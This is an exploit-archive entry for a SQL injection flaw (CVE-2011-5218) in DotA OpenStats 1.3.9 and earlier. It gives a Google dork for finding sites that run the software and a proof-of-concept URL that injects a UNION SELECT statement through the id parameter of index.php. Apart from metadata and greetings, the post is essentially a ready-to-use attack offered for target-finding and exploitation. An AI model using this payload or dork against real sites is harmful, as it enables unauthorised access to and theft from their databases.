DotA OpenStats 1.3.9 - SQL Injection
| EKU-ID: 24061 | CVE: OSVDB-77944;CVE-2011-5218 | OSVDB-ID: |
| Author: HvM17 | Published: 2011-12-19 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 24061 | CVE: OSVDB-77944;CVE-2011-5218 | OSVDB-ID: |
| Author: HvM17 | Published: 2011-12-19 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
============= # Exploit Title: DotA OpenStats SQL Injection Vulnerability # Google Dork: "© 2011 Powered by DotA OpenStats" # Date: 19/12/2011 # Author: HvM17 # Version: 1.3.9 and below # Tested on: WinXP ============= # VenDor : http://openstats.iz.rs/ # Download script: https://sourceforge.net/projects/dotaopenstats/ ============= [~] Exploit http://localhost/dotaStats/index.php?id='1 UNION SELECT 1,2,3,4 ============ Made IN INDONESIA Greetz for All HVM crew :) ============